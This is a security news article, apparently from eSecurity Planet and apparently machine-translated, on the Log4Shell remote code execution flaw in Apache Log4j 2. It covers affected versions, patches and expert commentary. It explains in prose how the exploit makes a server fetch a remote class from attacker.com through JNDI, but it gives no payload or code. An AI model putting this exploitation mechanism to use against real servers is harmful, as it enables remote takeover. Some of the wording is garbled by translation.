A serious vulnerability in the open source logging software Apache Log4j 2 is causing chaotic competition in the network security world. The Apache Software Foundation (ASF) has issued an emergency security update because bad actors are searching for vulnerable servers.
Log4j 2 was developed by ASF and is a widely used Java package that supports logging in to a series of popular applications. The vulnerability, tracked as CVE-2021-44228, is a zero-day vulnerability that allows unauthenticated remote code execution (RCE), allowing attacks to control the system running the software.
The vulnerability is called Log4Shell, and its severity score is 10/10, which is the highest possible score. The Apache Foundation released an emergency patch as part of the Log4j 2 2.15.0 version to fix the RCE vulnerability. Later on Friday, Cybereason released a vaccine to prevent the Log4Shell vulnerability.
Read the latest information about Log4Shell vulnerabilities
According to security professionals, the software is used by enterprise applications and cloud-based services, and the vulnerability could have a wide-ranging impact on the enterprise. According to reports, Log4Shell will also affect the default configuration of multiple Apache frameworks, such as Apache Struts2, Apache Druid and Apache Flink.
Free Wortley and Chris Thompson, CEOs of the cyber security company LunaSec, said: “Given the ubiquity of the library, the impact of exploits (full server control), and the ease of exploitation, the impact of this vulnerability is very serious.” One of the company’s Developers wrote in a blog post. "Anyone who uses Apache Struts may be attacked. We have seen similar vulnerabilities exploited in the 2017 Equifax data breach and other breaches."
They wrote that many services are vulnerable, including cloud services such as Apple iCloud and Steam, and applications such as Minecraft. Open source projects such as Paper, the server used by Minecraft, have begun patching Log4j 2. Servers used by well-known companies such as Twitter, Cloudflare, Apple, and Tencent have also been found to be vulnerable to Log4Shell attacks.
According to reports, many other open source projects, such as ElasticSearch, Redis, and Elastic Logstash, also use Log4j.
The Log4Shell vulnerability emerged a few months after open source security became the central topic of discussion at this year's Black Hat Conference.
Also read: Top Vulnerability Management Tools in 2021
The US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert, urging users to apply patches to upgrade the software or use the mitigation steps recommended by ASF.
The RCE vulnerability-originally discovered by the Alibaba Cloud security team at the end of last month-affects Log4j versions 2.0-beta9 to 2.14.1. According to LunaSec, when data from users is sent to the server using any protocol, Log4Shell can be exploited on vulnerable servers. Then, the server records the data in the request containing the malicious payload, and the payload triggers the Log4j vulnerability.
The server sends a request to attacker.com through the Java Naming and Directory Interface (JNDI), and the response contains the path of the remote Java class file, which is injected into the server process. The injected payload triggers the second stage, which then allows the attacker to execute arbitrary code.
A series of activities surrounding Log4Shell began on Thursday, when it was revealed in a tweet on Twitter, which included a proof-of-concept (PoC) code.
"This is the worst-case scenario," Casey Ellis, founder and chief technology officer of crowdsourcing security vendor Bugcrowd, told eSecurity Planet, noting that "Log4j is used ubiquitously in software and platforms, and there are many ways to exploit this vulnerability. The combination of, you can patch the dependencies of this vulnerability without breaking other things, and the fact that the exploit itself is suitable for tweets. For many people, this will be a long weekend."
Also read: Best Patch Management Software of 2021
Many organizations, including Deutsche Telekom and New Zealand’s Computer Emergency Response Team (CERT), said they have seen attackers looking for servers vulnerable to Log4Shell attacks. Deutsche Telekom officials stated in a tweet that they "are observing attacks on our honeypot infrastructure from the TOR network."
In a similar tweet, the security company GreyNoise reported that it "currently sees 2 unique IPs scanning the Internet for new Apache Log4j RCE vulnerabilities..."
"The RCE vulnerability on the web server represents the most serious problem," John Bambenek, chief threat hunter at the network security company Netenrich, told eSecurity Planet. "As the PoC code has been released, we are likely to start seeing exploits by the end of today. Since web applications running this type of setup usually handle sensitive information, relevant mitigation measures should be applied immediately, including updating Java. "
He added that the web application firewall should also be updated to include appropriate rules to prevent such attacks.
Researchers from the network security company Randori's Attack Team wrote in a blog post that they developed an effective exploit program and successfully exploited the Log4j vulnerability in the customer's environment as part of the vendor's offensive security platform.
They wrote: "The vulnerability can be accessed through a variety of application-specific methods." "In fact, any scenario that allows remote connections to provide arbitrary data written to log files by applications that use the Log4j library can easily be exploited. This vulnerability is very likely to be exploited in the wild and may affect thousands of organizations. This vulnerability poses a significant real risk to the affected system."
Nevertheless, the Randori researchers wrote that it is not easy to assess the long-term impact of Log4Shell. However, the direct impact will be felt.
"The Log4j 2 library is very commonly used in enterprise Java software," they wrote. "Because of this deployment method, the impact is difficult to quantify. Similar to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe that more and more vulnerable products will be discovered in the coming weeks. Because of the ease of use and scope of application Broad, we suspect that ransomware attackers will immediately start exploiting this vulnerability."
Dor Dali, director of information security at network security provider Vulcan Cyber told eSecurity Planet that he listed it as the top three most serious vulnerabilities that occurred this year.
"It is no exaggeration to say that every enterprise organization uses Java, and Log4j is one of the most popular Java logging frameworks," Dali said. "At the connection point, if mitigation measures are not taken immediately, the impact of this vulnerability will have great influence and potential. The Log4j vulnerability is relatively easy to exploit. We have seen verifiable reports that bad actors are actively targeting the world. Activities of some of the largest companies."
Further reading: The best risk management software of 2021
eSecurity Planet is the main resource for IT professionals in large enterprises, who are actively researching network security vendors and the latest trends. eSecurity Planet focuses on providing guidance on how to deal with common security challenges, as well as in-depth research of information on advanced cyber security topics.
Use TechnologyAdvice to advertise on eSecurity Planet and our other IT-focused platforms.
Property of TechnologyAdvice. © 2021 Technical consultation. Copyright Advertiser Disclosure: Some of the products appearing on this website come from companies from which TechnologyAdvice receives compensation. This compensation may affect how and where the products are displayed on this website, including the order in which they appear. TechnologyAdvice does not include all companies or all types of products available on the market.